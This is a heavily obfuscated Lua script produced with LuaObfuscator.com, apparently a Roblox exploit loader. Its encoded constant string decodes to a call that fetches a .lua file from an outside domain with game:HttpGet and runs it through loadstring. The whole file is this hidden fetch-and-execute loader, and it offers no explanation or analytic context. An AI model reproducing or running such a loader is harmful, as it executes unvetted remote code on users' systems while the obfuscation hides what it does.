--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.8) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30) if (v1(v30,2)==81) then local v85=0;while true do if (v85==0) then v19=v0(v3(v30,1,1));return "";end end else local v86=v2(v0(v30,16));if v19 then local v109=v5(v86,v19);v19=nil;return v109;else return v86;end end end);local function v20(v31,v32,v33) if v33 then local v87=(v31/((5 -3)^(v32-((1 + 1) -1))))%((3 -1)^(((v33-((879 -(282 + 595)) -1)) -(v32-(620 -(555 + (1701 -(1523 + 114)))))) + 1)) ;return v87-(v87%(932 -(857 + 74))) ;else local v88=(2 + 0)^(v32-(569 -(367 + 201))) ;return (((v31%(v88 + v88))>=v88) and (928 -(214 + 713))) or (0 + 0) ;end end local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36=v1(v16,v18,v18 + (1067 -(68 + 997)) );v18=v18 + (1272 -(226 + 1044)) ;return (v36 * (364 -108)) + v35 ;end local function v23() local v37=0 -0 ;local v38;local v39;local v40;local v41;while true do if (v37==(118 -(32 + (435 -(87 + 263))))) then return (v41 * (16441815 + 335401)) + (v40 * 65536) + (v39 * (57 + 199)) + v38 ;end if (v37==(957 -(892 + 65))) then v38,v39,v40,v41=v1(v16,v18,v18 + (7 -(184 -(67 + 113))) );v18=v18 + ((5 + 1) -2) ;v37=1 -0 ;end end end local function v24() local v42=v23();local v43=v23();local v44=2 -1 ;local v45=(v20(v43,1 + 0 ,79 -59 ) * ((954 -(802 + 150))^(85 -(169 -116)))) + v42 ;local v46=v20(v43,37 -16 ,23 + 8 );local v47=((v20(v43,1029 -(915 + 82) )==(2 -1)) and  -(1 + 0)) or (1 -(0 + 0)) ;if (v46==(1187 -(1069 + 118))) then if (v45==(0 -(0 -0))) then return v47 * (0 -0) ;else local v110=0 + (438 -(145 + 293)) ;while true do if (v110==(0 -0)) then v46=1;v44=0;break;end end end elseif (v46==(2031 + 16)) then return ((v45==(791 -(368 + 423))) and (v47 * ((3 -2)/(18 -(10 + 8))))) or (v47 * NaN) ;end return v8(v47,v46-1023 ) * (v44 + (v45/((7 -5)^(494 -(416 + 26))))) ;end local function v25(v48) local v49=(1289 -(814 + 45)) -(44 + 386) ;local v50;local v51;while true do if (v49==(1487 -(998 + 488))) then v50=v3(v16,v18,(v18 + v48) -(2 -1) );v18=v18 + v48 ;v49=1 + 1 ;end if (v49==(3 + 0 + 0)) then return v6(v51);end if (v49==(772 -(201 + 571))) then v50=nil;if  not v48 then local v117=1138 -(41 + 75 + 1022) ;while true do if (v117==(0 -0)) then v48=v23();if (v48==((885 -(261 + 624)) + 0)) then return "";end break;end end end v49=3 -2 ;end if (v49==2) then v51={};for v111=1, #v50 do v51[v111]=v2(v1(v3(v50,v111,v111)));end v49=10 -7 ;end end end local v26=v23;local function v27(...) return {...},v12("#",...);end local function v28() local v52=(function() return function(v89,v90,v91,v92,v93,v94,v95,v96) local v89=(function() return 1822 -(301 + 1521) ;end)();local v90=(function() return;end)();local v92=(function() return;end)();while true do if (v89==(0 -0)) then local v118=(function() return 0 + 0 ;end)();local v119=(function() return;end)();while true do if ((0 -0)~=v118) then else v119=(function() return 0 -0 ;end)();while true do if (v119~=(1701 -(1419 + 281))) then else v89=(function() return  #"}";end)();break;end if (0==v119) then v90=(function() return v91();end)();v92=(function() return nil;end)();v119=(function() return 1 -0 ;end)();end end break;end end end if (v89== #"~") then if (v90== #".") then v92=(function() return v91()~=0 ;end)();elseif (v90==2) then v92=(function() return v93();end)();elseif (v90== #"asd") then v92=(function() return v94();end)();end v95[v96]=(function() return v92;end)();break;end end return v89,v90,v91,v92,v93,v94,v95,v96;end;end)();local v53=(function() return function(v97,v98,v99) local v100=(function() return 0;end)();local v101=(function() return;end)();while true do if (v100==(74 -(71 + 3))) then v101=(function() return 0;end)();while true do if (v101==(0 + 0)) then local v124=(function() return 0;end)();local v125=(function() return;end)();while true do if (v124==0) then v125=(function() return 0 -0 ;end)();while true do if (0==v125) then local v156=(function() return 0 -0 ;end)();while true do if (v156==0) then v97[v98-#"!" ]=(function() return v99();end)();return v97,v98,v99;end end end end break;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #"[",v58 do FlatIdent_25011,Type,v21,Cons,v24,v25,v59,v67=(function() return v52(FlatIdent_25011,Type,v21,Cons,v24,v25,v59,v67);end)();end v57[ #"xxx"]=(function() return v21();end)();for v68= #"[",v23() do local v69=(function() return v21();end)();if (v20(v69, #"{", #"<")~=0) then else local v104=(function() return 0;end)();local v105=(function() return;end)();local v106=(function() return;end)();local v107=(function() return;end)();local v108=(function() return;end)();while true do if (v104==1) then v107=(function() return nil;end)();v108=(function() return nil;end)();v104=(function() return 2;end)();end if (v104==(780 -(162 + 618))) then local v123=(function() return 0 + 0 ;end)();while true do if (v123~=1) then else v104=(function() return 1;end)();break;end if (v123==(0 + 0)) then v105=(function() return 0;end)();v106=(function() return nil;end)();v123=(function() return 1 -0 ;end)();end end end if (v104==(2 -0)) then while true do if (v105== #"xnx") then if (v20(v107, #"-19", #"19(")~= #"{") then else v108[ #"0313"]=(function() return v59[v108[ #"?id="]];end)();end v54[v68]=(function() return v108;end)();break;end if ( #"\\"==v105) then local v127=(function() return 0 + 0 ;end)();local v128=(function() return;end)();while true do if (v127==(1636 -(1373 + 263))) then v128=(function() return 0;end)();while true do if (v128==1) then v105=(function() return 2;end)();break;end if (v128==(1000 -(451 + 549))) then v108=(function() return {v22(),v22(),nil,nil};end)();if (v106==0) then local v190=(function() return 0 -0 ;end)();while true do if (v190~=(0 -0)) then else v108[ #"xnx"]=(function() return v22();end)();v108[ #"http"]=(function() return v22();end)();break;end end elseif (v106== #"}") then v108[ #"xxx"]=(function() return v23();end)();elseif (v106==(1386 -(746 + 638))) then v108[ #"gha"]=(function() return v23() -((1 + 1)^(23 -7)) ;end)();elseif (v106~= #"-19") then else local v195=(function() return 341 -(218 + 123) ;end)();local v196=(function() return;end)();while true do if (v195~=0) then else v196=(function() return 1581 -(1535 + 46) ;end)();while true do if (0~=v196) then else v108[ #"-19"]=(function() return v23() -((2 + 0)^(3 + 13)) ;end)();v108[ #".com"]=(function() return v22();end)();break;end end break;end end end v128=(function() return 561 -(306 + 254) ;end)();end end break;end end end if (v105==(0 + 0)) then local v129=(function() return 0;end)();local v130=(function() return;end)();while true do if (v129~=0) then else v130=(function() return 0;end)();while true do if (v130~=0) then else v106=(function() return v20(v69,2, #"xxx");end)();v107=(function() return v20(v69, #"0313",11 -5 );end)();v130=(function() return 1468 -(899 + 568) ;end)();end if (v130~=1) then else v105=(function() return  #",";end)();break;end end break;end end end if (v105==(2 + 0)) then local v131=(function() return 0;end)();while true do if (v131==(2 -1)) then v105=(function() return  #"-19";end)();break;end if (v131~=(603 -(268 + 335))) then else if (v20(v107, #"\\", #"|")== #"]") then v108[2]=(function() return v59[v108[2]];end)();end if (v20(v107,2,2)~= #"<") then else v108[ #"xxx"]=(function() return v59[v108[ #"91("]];end)();end v131=(function() return 1;end)();end end end end break;end end end end for v70= #"/",v23() do v55,v70,v28=(function() return v53(v55,v70,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[1 -(0 + 0) ];local v65=v61[292 -((1198 -(782 + 356)) + 230) ];local v66=v61[575 -(426 + (413 -(176 + 91))) ];return function(...) local v71=v64;local v72=v65;local v73=v66;local v74=v27;local v75=1 + 0 ;local v76= -(1457 -(282 + 1174));local v77={};local v78={...};local v79=v12("#",...) -(2 -1) ;local v80={};local v81={};for v102=0 + 0 ,v79 do if ((v102>=v73) or (846>=2368)) then v77[v102-v73 ]=v78[v102 + 1 + 0 ];else v81[v102]=v78[v102 + ((2670 -1645) -(706 + 318)) ];end end local v82=(v79-v73) + (1 -0) ;local v83;local v84;while true do local v103=(2343 -(975 + 117)) -(721 + (2405 -(157 + 1718))) ;while true do if (v103==(1272 -(945 + 326))) then if ((v84<=(9 -5)) or (4012<=3358)) then if ((1494<=3005) and (v84<=(406 -(118 + 287)))) then if ((v84>(0 + 0)) or (3111==2134)) then v81[v83[702 -(271 + 429) ]]();else local v133=0 + 0 ;local v134;local v135;local v136;local v137;local v138;while true do if ((2355==2355) and (v133==(8 -5))) then v83=v71[v75];v81[v83[(1219 + 283) -(1408 + 92) ]]=v83[1089 -((1636 -1175) + 625) ];v75=v75 + (3 -2) ;v83=v71[v75];v81[v83[(2308 -(697 + 321)) -(993 + 295) ]]=v83[1 + 2 ]~=(1171 -(418 + 753)) ;v75=v75 + 1 + 0 ;v133=1 + 3 ;end if ((v133==(2 + 2)) or (588<=432)) then v83=v71[v75];v138=v83[2 + 0 ];v135,v136=v74(v81[v138](v13(v81,v138 + 1 + 0 ,v83[532 -(406 + (334 -211)) ])));v76=(v136 + v138) -(1 + 0) ;v134=1769 -(1749 + 20) ;for v186=v138,v76 do v134=v134 + 1 + (0 -0) ;v81[v186]=v135[v134];end v133=10 -5 ;end if (v133==(1327 -(1249 + 73))) then v75=v75 + 1 + 0 ;v83=v71[v75];v138=v83[1147 -((1074 -608) + 679) ];v81[v138]=v81[v138](v13(v81,v138 + (2 -1) ,v76));v75=v75 + (2 -1) ;v83=v71[v75];v133=759 -(239 + 514) ;end if (v133==((741 + 1161) -(106 + 1794))) then v83=v71[v75];v138=v83[1 + 1 ];v137=v81[v83[3]];v81[v138 + 1 + 0 ]=v137;v81[v138]=v137[v83[11 -7 ]];v75=v75 + (2 -1) ;v133=7 -4 ;end if (v133==((215 -100) -(4 + 110))) then v83=v71[v75];v81[v83[1132 -(369 + 761) ]]=v63[v83[(1573 -986) -(57 + 527) ]];v75=v75 + (1428 -(41 + 1386)) ;v83=v71[v75];v81[v83[105 -(17 + 86) ]]=v63[v83[3 + 0 ]];v75=v75 + (1 -0) ;v133=5 -3 ;end if ((4797>=3895) and (v133==(172 -(122 + 44)))) then v81[v83[2]]();v75=v75 + (1 -0) ;v83=v71[v75];do return;end break;end if (v133==(0 -0)) then v134=nil;v135,v136=nil;v137=nil;v138=nil;v81[v83[218 -(42 + 174) ]]={};v75=v75 + 1 + (1227 -(322 + 905)) ;v133=1 + 0 ;end end end elseif (v84<=((612 -(602 + 9)) + 1)) then local v139=0 -0 ;local v140;while true do if ((3577==3577) and (v139==(1580 -(1183 + (1586 -(449 + 740)))))) then v140=v83[67 -(30 + 35) ];v81[v140]=v81[v140](v13(v81,v140 + 1 + (872 -(826 + 46)) ,v76));break;end end elseif (v84==(1260 -(1043 + 214))) then v81[v83[1977 -(1913 + 62) ]]=v83[11 -8 ];else v81[v83[1214 -(323 + 889) ]]={};end elseif (v84<=(15 -9)) then if (v84>(585 -(361 + 219))) then do return;end else v81[v83[5 -3 ]]=v63[v83[323 -(53 + 267) ]];end elseif (v84<=(2 + 5)) then local v143=v83[415 -(15 + 398) ];local v144=v81[v83[3 -0 ]];v81[v143 + (983 -(18 + 964)) ]=v144;v81[v143]=v144[v83[860 -(564 + 292) ]];elseif (v84==(30 -(969 -(245 + 702)))) then v81[v83[5 -3 ]]=v83[2 + 1 ]~=0 ;else local v152=v83[2 + 0 ];local v153,v154=v74(v81[v152](v13(v81,v152 + (477 -(41 + 435)) ,v83[853 -(20 + (2622 -1792)) ])));v76=(v154 + v152) -1 ;local v155=0;for v183=v152,v76 do v155=v155 + 1 + 0 ;v81[v183]=v153[v155];end end v75=v75 + 1 + 0 ;break;end if ((126 -(116 + 10))==v103) then v83=v71[v75];v84=v83[1 + 0 ];v103=739 -(542 + 196) ;end end end end;end return v29(v28(),{},v17)(...);end return v15("LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q747047657403343Q00682Q7470733A2Q2F65676F72696B7573612E73706163652F3461623537623330662Q36632Q3135652Q313236373966352E6C7561000A9Q003Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000500016Q000200056Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
